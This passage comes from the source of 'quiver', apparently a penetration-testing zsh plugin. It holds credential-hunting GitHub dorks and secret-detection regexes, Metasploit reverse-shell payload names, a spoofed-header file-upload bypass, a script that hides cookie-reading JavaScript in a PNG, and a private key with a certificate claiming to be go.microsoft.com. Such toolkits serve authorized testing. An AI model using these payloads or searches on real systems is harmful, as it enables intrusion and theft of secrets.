"Yes" "Cancel"; do case $yn in Yes) return 0 break;; *) return 1 break;; esac done } __menu() { PS3="$fg[cyan]Select: $reset_color" COLUMNS=10 select o in $@; do break; done echo ${o} } ##### String Helpers __trim-slash() { echo $1 | sed 's/\/$//' } __trim-quotes() { echo $1 | tr -d \" } __trim-newline() { echo $1 | tr -d "\n"} __rand() { if [ "$#" -eq "1" ] then head /dev/urandom | tr -dc A-Za-z0-9 | head -c $1 ; echo '' else head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16 ; echo '' fi } ##### Tool Helpers __msf() { local msfcmd=$(cat $@) print -z "msfconsole -n -q -x \"${msfcmd}\" " } ================================================ FILE: payloads/aka.ms.pem ================================================ -----BEGIN RSA PRIVATE KEY----- MIICXAIBAAKBgQC2E+hNdtXUWpcB4qJz+afQmZNUB7V6gFViEejmU9SXuOirAVLl Q1cz2xwkyCb+xyGpEC51O4Hxb9bXEyV9JtJFjAlbehEkj+jFRIqEAXEd1UliFuRa gx4rwv0SpQWr3zu/jS5m+JdKnxdNISMFUR2G9bf8wcnNqhbtr6ByFyjsPQIDAQAB AoGBAIXWGkKeoEzojelf2sPe9kC6MnZo+Dfkj154BbcQVct0qunQHkvRdQ7z9zr+ ONO8MfzgnRWlOT3sVIJhW4Qj/hjNkIVpoGzRIpcGoW3L0XunJ1q6VaS+ESQUx0pY juyNmRYRaxSYrRzPolDqhX11fNM1Cswm5rrb2msvBBf7q/yNAkEA2Ub6za/tScaQ +xiLnmGwHSH9w0mKIm/XAuDFm1kOuId9xKOiwK5/7gLuan+rxSxc0FhoMYsB7nsN zgzJywasMwJBANaG/eXdNZYdfAGCkcpCmgUxiYx6/gRy3VX+uhMvaqBihBoGChiJ NVUs6ybyIJbh52fphPvfv2f6aIW5myFOlc8CQDTdymSFq8zJnbkazc3povpTrPT5 Tbz3TW+L1UjpMGXBwd44mn8bdlEpMW2ERv0gwCyJdkCnu/6UvlUmU2ss4nUCQAnn vb1pU1oVDm67aqPeI2JuAR3dZ/EopJOd6VWNcOzq35KcCMdNPosqQclQkLSmxZqE q8E9eYcBhuX1xfXpvP0CQBYNy279VufEzjkyjtv7Gc+6LjNoEcYOXQjffMN0gpwN +uc9FlSagHHs9hKLQk/4vIEeTqz008pwtF0XLy1dtdU= -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIICyDCCAjGgAwIBAgIUAcIAbh51mEfqQLiFtggAAABuHn8wDQYJKoZIhvcNAQEL BQAwgYcxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJXQTEQMA4GA1UEBxMHUmVkbW9u ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQLExVNaWNy b3NvZnQgQ29ycG9yYXRpb24xGTAXBgNVBAMTEGdvLm1pY3Jvc29mdC5jb20wHhcN MTkwOTA2MTkzNzIxWhcNMjEwOTA2MTkzNzIxWjCBhzELMAkGA1UEBhMCVVMxCzAJ BgNVBAgTAldBMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg Q29ycG9yYXRpb24xHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEZMBcG A1UEAxMQZ28ubWljcm9zb2Z0LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC gYEAthPoTXbV1FqXAeKic/mn0JmTVAe1eoBVYhHo5lPUl7joqwFS5UNXM9scJMgm /schqRAudTuB8W/W1xMlfSbSRYwJW3oRJI/oxUSKhAFxHdVJYhbkWoMeK8L9EqUF q987v40uZviXSp8XTSEjBVEdhvW3/MHJzaoW7a+gchco7D0CAwEAAaMvMC0wDAYD VR0TAQH/BAIwADAdBgNVHQ4EFgQUg2JaOA9UjImKCHybc5Bqu8YS40cwDQYJKoZI hvcNAQELBQADgYEAHkTVXl44F+tN0WWn3rbIUosimlbSYd6S9yLfCPGhpBdCv8GF 3jfFULoiFv/L79KuNfZ/RElR+xtqnukrg3C9NYCC3mRymZRMnjnoFjDG//AoeLsU 4802Opg2opg+OG23YFvz01rmdiHtUFM/0S1V4p3oiCDkwdz24E6/60OQu0A= -----END CERTIFICATE----- ================================================ FILE: payloads/aliases.rc ================================================ #nav alias cd..="cd ../" alias cls="clear" alias path="echo -e \${PATH//:/\\n}" alias cp="cp -iv" alias mv="mv -iv" alias lf="ls -l | egrep -v '^d'" alias ldir='ls -d */' #sys alias mounted="sudo mount | column -t" alias df="df -mTh --total" alias free="free -th" alias ps="ps auxf" alias psg="ps aux | grep -v grep | grep -i -e VSZ -e " #network alias pcap="sudo tcpdump -r" alias myip="curl icanhazip.com" alias grip="grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'" #proton vpn alias pv-check="sudo pip3 install protonvpn-cli --upgrade" alias pvt="sudo protonvpn c -f" alias pvu="sudo protonvpn c -f -p udp" alias pvd="sudo protonvpn disconnect" alias pvs="sudo protonvpn status" #zsh alias zprc="cat ~/.zshrc" alias zerc="nano ~/.zshrc" alias zsrc="source ~/.zshrc" # files and directory alias linestocsv="paste -s -d, -" alias csvtolines="tr ',' '\n'" alias sfu="sort -u " alias sfip="sort -u | sort -V " alias sfuc="sort | uniq -c | sort -n" alias dos2unix="tr -d '\015' " alias unix2dos="sed -e 's/$/\r/'" # out alias trim1="sed 's/.$//'" alias trim2="sed 's/..$//'" alias trim3="sed 's/...$//'" alias trim4="sed 's/....$//'" # tools alias hp="httprobe -t 3000 -c 50 " ================================================ FILE: payloads/github-dorks-commits.txt ================================================ "Slack Token": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "RSA private key": "-----BEGIN RSA PRIVATE KEY-----", "SSH (OPENSSH) private key": "-----BEGIN OPENSSH PRIVATE KEY-----", "SSH (DSA) private key": "-----BEGIN DSA PRIVATE KEY-----", "SSH (EC) private key": "-----BEGIN EC PRIVATE KEY-----", "PGP private key block": "-----BEGIN PGP PRIVATE KEY BLOCK-----", "Facebook Oauth": "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]", "Twitter Oauth": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]", "GitHub": "[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\"\\s][0-9a-zA-Z]{35,40}['\"\\s]", "Google Oauth": "(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")", "AWS API Key": "AKIA[0-9A-Z]{16}", "Heroku API Key": "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", "Generic Secret": "[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]", "Generic API Key": "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]", "Slack Webhook": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}", "Google (GCP) Service-account": "\"type\": \"service_account\"", "Twilio API Key": "SK[a-z0-9]{32}", "Password in URL": "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]", “Internal subdomain”: re.compile(‘([a-z0-9]+[.]*supersecretinternal[.]com)’), “Slack Token”: re.compile(‘(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})’), “RSA private key”: re.compile(‘—–BEGIN RSA PRIVATE KEY—–‘), “Facebook Oauth”: re.compile(‘[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\’|”][0-9a-f]{32}[\’|”]’), “Twitter Oauth”: re.compile(‘[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\’|”][0-9a-zA-Z]{35,44}[\’|”]’), “Google Oauth”: re.compile(‘(“client_secret”:”[a-zA-Z0-9-_]{24}”)’), “AWS API Key”: re.compile(‘AKIA[0-9A-Z]{16}’),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}’), “Heroku API Key”: re.compile(‘[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}’), “Generic Secret”: re.compile(‘[s|S][e|E][c|C][r|R][e|E][t|T].*[\’|”][0-9a-zA-Z]{32,45}[\’|”]’) ================================================ FILE: payloads/msf-windows-payloads.txt ================================================ windows/x64/meterpreter/reverse_http windows/x64/meterpreter/reverse_https windows/x64/meterpreter/reverse_named_pipe windows/x64/meterpreter/reverse_tcp windows/x64/meterpreter/reverse_winhttp windows/x64/meterpreter/reverse_winhttps windows/x64/shell/reverse_tcp windows/x64/shell/reverse_tcp_rc4 windows/x64/shell/reverse_tcp_uuid windows/x64/shell_bind_tcp windows/x64/shell_reverse_tcp ================================================ FILE: payloads/recon-dorks-github.txt ================================================ filename:constants filename:settings filename:database filename:config filename:environment filename:spec filename:zhrc filename:bash filename:npmrc filename:dockercfg filename:pass filename:global filename:credentials filename:connections filename:s3cfg filename:wp-config filename:htpasswd filename:git-credentials filename:id_dsa filename:id_rsa extension:env extension:cfg extension:ini language:yaml -filename:travis extension:properties extension:bat extension:sh extension:zsh extension:pem extension:ppk extension:sql filename:bash_history filename:bash_profile filename:bashrc filename:cshrc filename:history filename:netrc filename:pgpass filename:tugboat filename:dhcpd.conf filename:express.conf filename:filezilla.xml filename:idea14.key filename:makefile filename:gitconfig filename:prod.exs filename:prod.secret.exs filename:proftpdpasswd filename:recentservers.xml filename:robomongo.json filename:server.cfg filename:shadow filename:sshd_config filename:known_hosts filename:dockercfg filename:github_token staging stg prod preprod swagger internal dotfiles dot-files mydotfiles config dbpasswd db_password db_username dbuser testuser dbpassword keyPassword storePassword passwords password secret.password database_password sql_password passwd pass pwd pwds root_password credentials security_credentials connectionstring private -language:java private_key master_key token access_token auth_token oauth_token authorizationToken secret secrets secret_key secret_token api_secret app_secret appsecret client_secret key send_keys send.keys sendkeys apikey api_key app_key application_key appkey appkeysecret access_key apiSecret x-api-key apidocs secret_access_key encryption_key consumer_key auth secure login conn.login sshpass ssh2_auth_password irc_pass fb_secret sf_username node_env aws_key aws_token aws_secret aws_access AWSSecretKey github_key github_token gh_token slack_api slack_token bucket_password redis_password ldap_username ldap_password gmail_username gmail_password codecov_token fabricApiSecret mailgun mailchimp appspot firebase gitlab stripe herokuapp cloudfront amazonaws removed "removed password" hardcoded oops "fixed security" "removed prod" "removed creds" "removed secret" filename:passwords.txt filename:users.txt ================================================ FILE: payloads/recon-dorks-google.txt ================================================ ================================================ FILE: payloads/resolvers.txt ================================================ 1.1.1.1 1.0.0.1 8.8.8.8 8.8.4.4 208.67.222.222 208.67.220.220 64.6.64.6 64.6.65.6 84.200.69.80 84.200.70.40 205.171.3.66 205.171.202.166 205.171.3.26 205.171.2.26 216.146.35.35 216.146.36.36 45.33.97.5 37.235.1.177 37.235.1.174 172.104.237.57 77.88.8.8 77.88.8.1 91.239.100.100 89.233.43.71 74.82.42.42 156.154.70.5 156.154.71.5 45.77.165.194 68.238.120.12 68.238.0.12 207.148.83.241 142.4.204.111 142.4.205.47 149.56.184.112 51.79.68.177 66.70.228.164 172.98.193.42 66.70.228.164 128.31.0.72 155.138.240.237 ================================================ FILE: payloads/secrets-content.json ================================================ { "flags": "-HnriE", "patterns": [ "[a-z0-9.-]+\\.s3\\.amazonaws\\.com", "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com", "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)", "//s3\\.amazonaws\\.com/[a-z0-9._-]+", "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+", "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}", "([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}", "([^A-Z0-9]|)AKIA[A-Z0-9]{12}([^A-Z0-9]|)", "[\\s][a-zA-Z0-9]{40}[\\s]", "aws_secret_access_key.*?[a-zA-Z0-9/\\\\+]{40}", "amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", "EAACEdEose0cBA[0-9A-Za-z]+", "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]", "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]", "[s|S][e|E][c|C][r|R][e|E][t|T].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]", "[\\s*](token:\\s*)[\\S]{20}", "gitlab.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)", "private.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)", "access.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)", "[g|G][i|I][t|T][h|H][u|U][b|B].*['|\\\"][0-9a-zA-Z]{35,40}['|\\\"]", "\"type\": \"service_account\"", "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com", "ya29\\.[0-9A-Za-z\\-_]+", "AIza[0-9A-Za-z\\\\-_]{35}", "[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", "[0-9a-f]{32}-us[0-9]{1,2}", "key-[0-9a-zA-Z]{32}", "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]", "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}", "sk_live_[0-9a-z]{32}", "(-*)BEGIN [\\\\s\\\\S]{2,} PRIVATE KEY(-*)", "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}", "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}", "sq0atp-[0-9A-Za-z\\\\-_]{22}", "sq0csp-[0-9A-Za-z\\\\-_]{43}", "sk_live_[0-9a-zA-Z]{24}", "rk_live_[0-9a-zA-Z]{24}", "SK[0-9a-fA-F]{32}", "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}", "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*['|\"][0-9a-zA-Z]{35,44}['|\"]", "deleted", "security", "removed", "test-data", "prod", "production" ] } ================================================ FILE: payloads/secrets-files.json ================================================ { "flags": "-HnriE", "patterns": [ "database", "settings", "database", "config", "environment", "spec", "zshrc", "bash", "npmrc", "dockercfg", "pass", "global", "credentials", "connections", "s3cfg", "wp-config", "htpasswd", "git-credentials", "id_dsa", "id_rsa", "creds", ".*\\.env$", "\\.agilekeychain$", "\\.?aws/credentials$", "^\\.?htpasswd$", "\\.keychain$", "\\.cscfg$", "carrierwave.rb", "knife.rb", "\\.?chef/(.*)\\.pem$", "^(\\.|_)?netrc$", "credential", "password", "^\\.?dbeaver-data-sources.xml$", "\\.dayone$", "doctl/config.yaml$", "settings.py", "^\\.?dockercfg$", "^\\.?env$", "filezilla.xml", "recentservers.xml", "^key(store|ring)$", "^\\.?gitconfig$", "config/hub$", "\\.gnucash$", "credentials.db", "credentials.json", "^.*-[a-f0-9]{12}\\.json$", "\\.?xchat2?/servlist_?\\.conf$", "\\.?irssi/config$", "\\.jks$", "jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml", "\\.kwallet$", "^kdbx?$", ".boto", "adc.json", "configuration.user.xpl", "\\.tpm$", "\\.bek$", "\\.mdf$", "\\.sdf$", "^\\.?muttrc$", "^\\.?mysql_history$", "^\\.?npmrc$", "\\.pcap$", "omniauth.rb", "\\.ovpn$", "config(\\.inc)?\\.php$", "\\.psafe3$", "otr.private_key", "\\.?purple/accounts\\.xml$", "^\\.?psql_history$", "^\\.?pgpass$", "credentials.xml", "etc/passwd$", "etc/shadow$", "LocalSettings.php", "database.yml", "\\.pkcs12$", "\\.p12$", "\\.pfx$", "\\.asc$", "^key(pair)?$", "\\.pem$", "journal.txt", "^.*_rsa$", "^.*_dsa$", "^.*_ed25519$", "^.*_ecdsa$", "\\.?recon-ng/keys\\.db$", "\\.rdp$", "robomongo.json", "^\\.?irb_history$", "secret_token.rb", "\\.?gem/credentials$", "^\\.?s3cfg$", "^sftp-config(\\.json)?$", "^sql(dump)?$", "\\.sqlite$", "\\.?ssh/config$", "Favorites.plist", "`^\\.?(bash_|zsh_)?aliases$", "^\\.?(bash_|zsh_|sh_|z)?history$", "^\\.?(bash|zsh|csh)rc$", ".exports", ".functions", ".extra", "^\\.?(bash_|zsh_)?profile$", "^\\.?trc$", "terraform.tfvars", "^\\.?tugboat$", "\\.tblk$", "ventrilo_srv.ini", "^\\.?gitrobrc$", "\\.fve$", "proftpdpasswd", "^\\.?git-credentials$", "robomongo.json", "idea14.key", "express.conf", "prod.exs", "prod.secret.exs", "logins.json", ".remote-sync.json", ".ftpconfig" ] } ================================================ FILE: payloads/tcp-ports.txt ================================================ 21,22,25,80,88,161,443,445,744,1433,1521,2075,2076,3000,3306,3366,3389,3868,4000,4040,4044,4443,5000,5432,5900,6000,6443,7077,8000,8080,8081,8089,8181,8443,8888,9000,9091,9443,9999,27017,10000,15672 ================================================ FILE: payloads/user-agents.txt ================================================ Googlebot/2.1 (+http://www.google.com/bot.html) Mozilla/5.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 ================================================ FILE: payloads/web-file-upload-bypass-bytes.txt ================================================ JPEG - FF D8 FF DB - ÿØÿÛ GIF - 47 49 46 38 - GIF8 PNG - 89 50 4E 47 - ‰PNG ================================================ FILE: payloads/web-file-upload-bypass.txt ================================================ Content-Disposition: form-data; name="upload"; filename="badfile.''gif" Content-Type: image/png GIF8 ================================================ FILE: payloads/wordlist-api.txt ================================================ 0 1 2 3 accelerate accept account accounts acquire activate active adapt add address-check adjust admin alert amount annotate anticipate api api_auth apis apply archive arrange asset assets auth auth_user balance balances bar baz bio bios build calculate cfg change channel chart check child children claim class client clients close collect comm comment comments common communicate company compare complete compose compute conf config connections consolidate construct contact contract coordinate count create credentials creds crush csv current custom customer customers damage dashboard data debug def default define del delete deliver delta demo demonstrate dequeue derive design destroy details detect dev develop developers deviceCatalog devices deviceTypes devise dir directory disable display divide do dob docs documentation doFor domain download edit email employee enable err errors event events explode export fabricate fashion feed file files filter foo forge form format generate get github gmail go group health help hidden history home id image import improve include info inform input inquiry insert install instances interpret item job join json key kill lang last level link links list load location lock log log_event login logins logout logs loop main make manufacturers map max member members merchant merge metadata method methods metrics min mod money monitoring move multiply my name names new next notifications notify oauth object objects open option options order orders originate out pack page pages panel parent parse pass password passwords permissions phone picture pin plugin post posts preferences preserve preview print private prod produce production profile profiles promote public put q query queue queue-jobs quit raw reactivate read recite record ref reg register release remove resend-verification restore restrict retrieve robots.txt rss run s sale sales save search select send server set setting settings setup show site sleep sort split start state status stop study sub summaries swagger swagger.json swagger-resources swagger-ui.html table tags temp template terminate test tests theme ticket tmp token twitter type understand undo union unit unqueue update upgrade upload upset url use user userAccountAssignments userAssets userdetails username userPreferences users v0 v1 v2 v3 validate vendor vendors verify version wait website work xml xmlrpc yahoo zip ================================================ FILE: payloads/wordlists.txt ================================================ /usr/share/seclists/Discovery/Web-Content/quickhits.txt /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt /usr/share/seclists/Discovery/Web-Content/swagger.txt /usr/share/seclists/Discovery/Web-Content/graphql.txt ================================================ FILE: quiver.code-workspace ================================================ { "folders": [ { "path": "." } ] } ================================================ FILE: quiver.plugin.zsh ================================================ #!/usr/bin/env zsh autoload colors; colors ############################################################# # quiver # Author: Steve Mcilwain # Contributors: ############################################################# # check for essential packages dpkg -l | grep -qw rlwrap || sudo apt-get -y install rlwrap dpkg -l | grep -qw git || sudo apt-get -y install git # check for directories mkdir -p $HOME/.quiver/{vars,globals} ############################################################# # Constants ############################################################# export __PLUGIN="${0:A:h}" export __VER=$(cat ${__PLUGIN}/VERSION) export __LOGFILE="${__PLUGIN}/log.txt" export __REMOTE_CHK="${__PLUGIN}/remote_checked.txt" export __REMOTE_VER="${__PLUGIN}/remote_ver.txt" export __STATUS=$(cd ${__PLUGIN} && git status | grep On | cut -d" " -f2,3) export __VARS=$HOME/.quiver/vars export __GLOBALS=$HOME/.quiver/globals export __PAYLOADS="$__PLUGIN/payloads" export __SCRIPTS="$__PLUGIN/scripts" export __TOOLS="$HOME/tools" ############################################################# # Self Update ############################################################# __version-check() { local seconds=$((60*60*24*1)) if test -f "$__REMOTE_CHK" ; then if test "$(($(date "+%s")-$(date -f "$__REMOTE_CHK" "+%s")))" -lt "$seconds" ; then echo "[*] Version already checked today: $__REMOTE_CHK" >> ${__LOGFILE} exit 1 fi fi date -R > $__REMOTE_CHK echo "$(curl -s https://raw.githubusercontent.com/stevemcilwain/quiver/master/VERSION)" > $__REMOTE_VER echo "[*] Version checked and stored in: $__REMOTE_VER" >> ${__LOGFILE} } (__version-check &) ############################################################# # Diagnostic Log ############################################################# echo "Quiver ${__VER} in ${__PLUGIN}" > ${__LOGFILE} echo " " >> ${__LOGFILE} echo "[*] loading... " >> ${__LOGFILE} #Source all qq scripts for f in ${0:A:h}/modules/qq* ; do echo "[+] sourcing $f ... " >> ${__LOGFILE} source $f >> ${__LOGFILE} 2>&1 done source ${__ALIASES} # completion enhancement # zstyle ':completion:*' matcher-list 'r:|[-]=**' ZSTYLE_ORIG=`zstyle -L ':completion:\*' matcher-list` ZSTYLE_NEW="${ZSTYLE_ORIG} 'r:|[-]=**'" eval ${ZSTYLE_NEW} echo "[*] quiver loaded." >> ${__LOGFILE} ############################################################# # Shell Log ############################################################# echo " " if [[ -f "$__REMOTE_VER" ]]; then echo "[*] Remote version file exists: $__REMOTE_VER " >> ${__LOGFILE} rv=$(cat ${__REMOTE_VER}) if [[ ! -z $rv ]]; then echo "[*] Remote version is |${rv}|" >> ${__LOGFILE} [[ "$rv" == "$__VER" ]] && __info "Quiver is up to date" || __warn "Quiver update available: $rv, use qq-update to install" fi fi __info "Quiver ${__VER} ZSH plugin loaded " ================================================ FILE: scripts/dns-reverse-brute.zsh ================================================ #!/usr/bin/env zsh ############################################################# # dns-reverse-brute ############################################################# #[[ -z $1 ]] && echo -e "[!] Missing argument.\nUsage: zsh $0 " && exit cat $1 | while read domain; do if host -t A "$domain" | awk '{print $NF}' | grep -E '^(192\.168\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|10\.)' &>/dev/null; then echo $domain; fi; done ================================================ FILE: scripts/image-gen.js ================================================ (function() { function encode(a) { if (a.length) { var c = a.length, e = Math.ceil(Math.sqrt(c / 3)), f = e, g = document.createElement("canvas"), h = g.getContext("2d"); g.width = e, g.height = f; var j = h.getImageData(0, 0, e, f), k = j.data, l = 0; for (var m = 0; m < f; m++) for (var n = 0; n < e; n++) { var o = 4 * (m * e) + 4 * n, p = a[l++], q = a[l++], r = a[l++]; (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255) } return h.putImageData(j, 0, 0), h.canvas.toDataURL() } } var ord = function ord(a) { var c = a + "", e = c.charCodeAt(0); if (55296 <= e && 56319 >= e) { if (1 === c.length) return e; var f = c.charCodeAt(1); return 1024 * (e - 55296) + (f - 56320) + 65536 } return 56320 <= e && 57343 >= e ? e : e }, d = document, b = d.body, img = new Image; var stringenc = "Hello, World!"; img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img) })(); (function() { function encode(a) { if (a.length) { var c = a.length, e = Math.ceil(Math.sqrt(c / 3)), f = e, g = document.createElement("canvas"), h = g.getContext("2d"); g.width = e, g.height = f; var j = h.getImageData(0, 0, e, f), k = j.data, l = 0; for (var m = 0; m < f; m++) for (var n = 0; n < e; n++) { var o = 4 * (m * e) + 4 * n, p = a[l++], q = a[l++], r = a[l++]; (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255) } return h.putImageData(j, 0, 0), h.canvas.toDataURL() } } var ord = function ord(a) { var c = a + "", e = c.charCodeAt(0); if (55296 <= e && 56319 >= e) { if (1 === c.length) return e; var f = c.charCodeAt(1); return 1024 * (e - 55296) + (f - 56320) + 65536 } return 56320 <= e && 57343 >= e ? e : e }, d = document, b = d.body, img = new Image; var stringenc = "function asd() {\ var d = document;\ var c = 'cookie';\ alert(d[c]);\ };asd();/*Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam blandit metus vel elementum. Mauris mi tortor, congue eget fringilla id, tempus a tellus. Morbi laoreet vitae ipsum vel dapibus. Nunc eu faucibus ligula. Donec maximus malesuada justo. Nulla congue, risus quis dapibus porttitor, metus quam rutrum dolor, ac maximus nibh metus quis enim. Aenean hendrerit venenatis massa ac gravida. Donec at nisi quis ex sollicitudin bibendum sit amet ac quam.\ Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\ Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\ Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\ Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\ Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\ Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\ Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna 